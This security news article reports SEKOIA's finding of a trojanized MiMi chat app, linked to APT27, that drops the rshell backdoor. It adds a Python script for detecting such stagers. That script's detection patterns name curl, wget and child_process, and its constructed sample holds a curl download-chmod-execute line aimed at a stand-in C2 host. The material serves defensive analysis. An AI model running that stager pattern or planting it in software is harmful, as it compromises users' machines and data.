
Chinese Hackers Backdoor Chat App to Steal Data From Windows, Linux & macOS

Researchers uncovered a trojanized version of MiMi, a chat application aimed primarily at the Chinese market. The application is cross-platform, and the backdoored build targets several operating systems. The researchers say the malware has several links to the Chinese state-backed threat group APT27.


SEKOIA cybersecurity researchers recently uncovered a trojanized version of MiMi, a cross-platform chat application aimed primarily at the Chinese market. The trojanized app delivers a newly identified backdoor, known as rshell, that can steal data from Linux and macOS systems. The backdoored build, version 2.3.0, had been in distribution for about four months by the time it was found. The discovery came while the team was scanning C2 infrastructure used by HyperBro malware and noticed unusual connections to this application.

The most interesting aspect of the case is the set of links between this malware and the Chinese state-backed threat group APT27 (also tracked as Emissary Panda, Iron Tiger and LuckyMouse).

The attackers inserted malicious JavaScript into the MiMi source code. The code first checks whether the application is running on macOS; if it is, the trojan downloads and executes the rshell backdoor. The backdoored release, MiMi version 2.3.0, was published on May 26, 2022. The malicious code sits in the app bundle at MiMi.app/Contents/Resources/app/electron-main.js, the Electron main-process script.

Once rshell is running, it collects system information and sends it to the C2 server, then waits for commands from the APT27 operators. Using it, the attackers can browse folders and files on the compromised system and read, write and download files.
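The staging pattern described above (a platform check in the Electron main-process script, followed by a download-and-execute of a second stage) is something a responder can hunt for directly in an app bundle. The following triage script is an added example for this article, not code from SEKOIA or from the MiMi case: the regexes, the bundle layout it walks and the two sample scripts it scans are assumptions constructed for illustration, not published indicators.

```python
"""Hunt for an Electron JavaScript stager of the kind described above.

Heuristic: a stager in the app's main-process script needs to (1) branch on the
host platform, (2) fetch a payload from the network and (3) execute it.  A .js
file is flagged only when all three traits appear, so ordinary Electron code that
merely checks process.platform is not reported.  The regexes below are
assumptions made for this example, not indicators published by SEKOIA.
"""
import re
import tempfile
from pathlib import Path
from typing import Dict, List

PLATFORM_RE = re.compile(
    r"process\.platform\s*[!=]==?\s*['\"](?:darwin|linux|win32)['\"]|\bos\.platform\(\)"
)
FETCH_RE = re.compile(
    r"https?\.(?:get|request)\(|\bfetch\(|\bcurl\b|\bwget\b|axios\.|\bnet\.connect\("
)
EXEC_RE = re.compile(
    r"child_process|\bexec(?:Sync|File|FileSync)?\(|\bspawn(?:Sync)?\(|\bchmod\b"
)


def score_js(source: str) -> Dict[str, bool]:
    """Return which stager traits a JavaScript source exhibits, plus a verdict."""
    traits = {
        "platform_check": bool(PLATFORM_RE.search(source)),
        "network_fetch": bool(FETCH_RE.search(source)),
        "exec_or_chmod": bool(EXEC_RE.search(source)),
    }
    traits["suspicious"] = all(traits.values())
    return traits


def scan_bundle(bundle: Path) -> List[Dict[str, object]]:
    """Score every .js file under <bundle>/Contents/Resources (macOS .app layout).

    Electron ships its application code there, either unpacked or inside
    app.asar; this example handles the unpacked case only.
    """
    resources = bundle / "Contents" / "Resources"
    findings: List[Dict[str, object]] = []
    for js_file in sorted(resources.rglob("*.js")):
        try:
            text = js_file.read_text(encoding="utf-8", errors="replace")
        except OSError:
            continue
        findings.append({"path": str(js_file.relative_to(bundle)), **score_js(text)})
    return findings


# Constructed samples for the demo below.  They model the behaviour described in
# the article and are NOT the trojanized MiMi code.
BENIGN_MAIN_JS = """
const { app, BrowserWindow } = require('electron');
if (process.platform === 'darwin') { app.dock.hide(); }   // common, harmless
app.whenReady().then(() => new BrowserWindow({ width: 800 }).loadFile('index.html'));
"""

STAGER_MAIN_JS = """
const { execSync } = require('child_process');
if (process.platform === 'darwin') {
  // fetch a second-stage binary, mark it executable and run it
  execSync('curl -o /tmp/stage2 https://c2.example.invalid/stage2 && chmod +x /tmp/stage2 && /tmp/stage2');
}
"""


def demo() -> List[Dict[str, object]]:
    """Build a throwaway .app bundle holding both samples and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        app_dir = Path(tmp) / "Demo.app" / "Contents" / "Resources" / "app"
        app_dir.mkdir(parents=True)
        (app_dir / "renderer.js").write_text(BENIGN_MAIN_JS)
        (app_dir / "electron-main.js").write_text(STAGER_MAIN_JS)
        return scan_bundle(Path(tmp) / "Demo.app")


if __name__ == "__main__":
    for finding in demo():
        flag = "SUSPICIOUS" if finding["suspicious"] else "ok"
        print(f"{flag:10} {finding['path']}")
```

Requiring all three traits together is the point of the design: a bare `process.platform` branch is everywhere in legitimate Electron code, and a bare `child_process` import is common too, but the combination with a network fetch inside the main-process script is what turns a chat client into a stager. In a real investigation you would run `scan_bundle` against the installed app and compare the flagged file against a known-good release of the same version.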

The backdoor also supports a download command that transfers files between the compromised host and the attackers' server. For now, SEKOIA says it cannot determine whether the attackers repurposed a legitimate chat application as spyware for collecting data, or whether that was its purpose from the start.
